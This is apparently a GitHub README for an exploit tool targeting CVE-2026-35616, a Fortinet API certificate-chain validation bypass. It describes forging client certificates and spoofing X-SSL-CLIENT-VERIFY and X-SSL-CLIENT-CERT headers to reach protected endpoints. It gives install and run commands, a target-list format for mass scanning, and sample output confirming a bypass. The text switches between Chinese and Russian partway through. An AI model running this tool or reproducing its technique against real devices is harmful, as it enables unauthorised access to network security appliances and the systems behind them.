wa6n3r/CVE-2026-35616

GitHub: wa6n3r/CVE-2026-35616

针对 Fortinet API 证书链校验漏洞的自动化利用脚本,伪造客户端证书以绕过信任验证。

Stars: 1 | Forks: 2

# CVE-2026-35616 ## 描述 利用 Fortinet API 中的证书链验证绕过漏洞。 该脚本会自动从各种来源发现有效的 Common Name (CN), 生成伪造的客户端证书,并使用 `X-SSL-CLIENT-VERIFY` 和 `X-SSL-CLIENT-CERT` 头部向受保护的 endpoint 发送请求。 ## 环境要求 - Python 3.8+ - 依赖项: - `requests` - `cryptography` - `urllib3` - 可选:`openssl`(用于通过 TLS handshake 进行高级 CA 发现) ## 安装 ``` # 克隆项目 git clone https://github.com/wa6n3r/CVE-2026-35616 cd CVE-2026-35616 # 安装依赖 pip install -r requirements.txt ## 使用 # 基本运行 python3 exploit.py # 指定目标和端口 python3 exploit.py [PORT] # 示例: python3 exploit.py 192.168.1.100 python3 exploit.py 10.0.0.50 8443 # 目标文件格式 (targets.txt) При массовом тестировании создайте файл targets.txt с одним целевым адресом на строку: 192.168.1.100:443 10.0.0.50:8443 fortigate.internal # 输出文件 При успешном выполнении скрипт создаёт: results/bypass_results___.json — детальный отчёт в формате JSON с: Использованным CN Статусами ответов по каждому эндпоинту Префиксами ответов для анализа # 输出结构 [ wa6n3r ] ◆ GH: github.com/wa6n3r ◆ WEB: wa6n3r.com [*] CVE-2026-35616 Target: https://192.168.1.100:443 [*] Discovering CA CNs from multiple sources... [•] TLS CA CN: 'fortinet-ca2' [•] ZTNA CA CN: 'support' [*] Found 2 candidate CN(s): fortinet-ca2, support [*] Testing 2 candidate CN(s) for bypass... [+] CN='support' | HTTP 200 | retval=1 | BYPASS CONFIRMED [*] Probing all cert_chain endpoints with CN='support'... GET /api/v1/system/capabilities HTTP 200: '{"result": {"retval": 1, ...}}' [+] Results saved to: results/bypass_results_192.168.1.100_443_20260101_120000.json ```
标签:Python, StruQ, 无后门, 渗透测试, 漏洞利用, 绕过验证